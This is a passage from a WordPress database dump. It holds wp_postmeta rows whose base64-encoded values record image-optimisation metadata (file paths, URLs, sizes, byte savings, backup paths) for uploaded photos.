XC8yMDE2XC8wOFwvMjAxNjA4MTJfMTQxOTQ0LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3MzgwLCJpZCI6MzczfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTQxOTQ0LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTQxOTQ0LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTQxOTQ0LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3MzgzLCJpZCI6MzczfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTQxOTQ0LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTQxOTQ0LTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTQxOTQ0LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3Mzg1LCJpZCI6MzczfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTQxOTQ0LTYwMHg2MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTQxOTQ0LTYwMHg2MDAuanBnIiwid2lkdGgiOiI2MDAiLCJoZWlnaHQiOiI2MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTQxOTQ0LTYwMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3Mzg4LCJpZCI6MzczfV0='); 
INSERT INTO `wp_postmeta` VALUES (30233, 372, 'wpfc_optimisation_reduction', '1156220'); 
INSERT INTO `wp_postmeta` VALUES (30234, 372, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA1MDA2LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA1MDA2LmpwZyIsIndpZHRoIjo1MzEyLCJoZWlnaHQiOjI5ODgsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDUwMDYuanBnIiwicmVkdWN0aW9uIjoxMTU2MDQ4LCJ0aW1lIjoxNDgzNTg3NDAxLCJpZCI6IjM3MiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA1MDA2LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA1MDA2LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA1MDA2LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3NDAzLCJpZCI6MzcyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIwMTYwODEyXzEwNTAwNi04MDB4NDUwLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NDUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIwMTYwODEyXzEwNTAwNi04MDB4NDUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzIwMTYwODEyXzEwNTAwNi04MDB4NDUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzQwNiwiaWQiOjM3Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDUwMDYtNzY4eDQzMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjQzMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDUwMDYtNzY4eDQzMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDUwMDYtNzY4eDQzMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc0MDksImlkIjozNzJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA1MDA2LTE2MDB4OTAwLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjkwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDUwMDYtMTYwMHg5MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA1MDA2LTE2MDB4OTAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzQxMywiaWQiOjM3Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDUwMDYtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDUwMDYtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDUwMDYtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc0MTUsImlkIjozNzJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA1MDA2LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA1MDA2LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA1MDA2LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3NDE4LCJpZCI6MzcyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIwMTYwODEyXzEwNTAwNi0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIwMTYwODEyXzEwNTAwNi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzIwMTYwODEyXzEwNTAwNi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzQyMCwiaWQiOjM3Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDUwMDYtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDUwMDYtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDUwMDYtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc0MjMsImlkIjozNzJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDUwMDYtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDUwMDYtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDUwMDYtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjE1OSwidGltZSI6MTQ4MzU4NzQyNiwiaWQiOjM3Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIwMTYwODEyXzEwNTAwNi0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIwMTYwODEyXzEwNTAwNi0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzIwMTYwODEyXzEwNTAwNi0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzQyOCwiaWQiOjM3Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIwMTYwODEyXzEwNTAwNi0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIwMTYwODEyXzEwNTAwNi0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzIwMTYwODEyXzEwNTAwNi0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzQzMSwiaWQiOjM3Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIwMTYwODEyXzEwNTAwNi0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIwMTYwODEyXzEwNTAwNi0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzIwMTYwODEyXzEwNTAwNi0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzQzMywiaWQiOjM3Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIwMTYwODEyXzEwNTAwNi00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIwMTYwODEyXzEwNTAwNi00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzIwMTYwODEyXzEwNTAwNi00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzQzNiwiaWQiOjM3Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIwMTYwODEyXzEwNTAwNi02MDB4NjAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIwMTYwODEyXzEwNTAwNi02MDB4NjAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNjAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzIwMTYwODEyXzEwNTAwNi02MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzQzOSwiaWQiOjM3Mn1d'); 
INSERT INTO `wp_postmeta` VALUES (30235, 371, 'wpfc_optimisation_reduction', '1154316'); 
INSERT INTO `wp_postmeta` VALUES (30236, 371, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTUzLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTUzLmpwZyIsIndpZHRoIjo1MzEyLCJoZWlnaHQiOjI5ODgsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5NTMuanBnIiwicmVkdWN0aW9uIjoxMTU0MjM0LCJ0aW1lIjoxNDgzNTg3NDUxLCJpZCI6IjM3MSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTUzLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTUzLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTUzLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3NDUzLCJpZCI6MzcxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIwMTYwODEyXzEwNDk1My04MDB4NDUwLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NDUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIwMTYwODEyXzEwNDk1My04MDB4NDUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzIwMTYwODEyXzEwNDk1My04MDB4NDUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzQ1NiwiaWQiOjM3MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5NTMtNzY4eDQzMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjQzMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5NTMtNzY4eDQzMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5NTMtNzY4eDQzMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc0NTksImlkIjozNzF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTUzLTE2MDB4OTAwLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjkwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5NTMtMTYwMHg5MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTUzLTE2MDB4OTAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzQ2MywiaWQiOjM3MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5NTMtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5NTMtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5NTMtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc0NjYsImlkIjozNzF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTUzLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTUzLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjAxNjA4MTJfMTA0OTUzLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3NDY4LCJpZCI6MzcxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIwMTYwODEyXzEwNDk1My0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIwMTYwODEyXzEwNDk1My0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzIwMTYwODEyXzEwNDk1My0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzQ3MSwiaWQiOjM3MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5NTMtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMDE2MDgxMl8xMDQ5NTMtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwv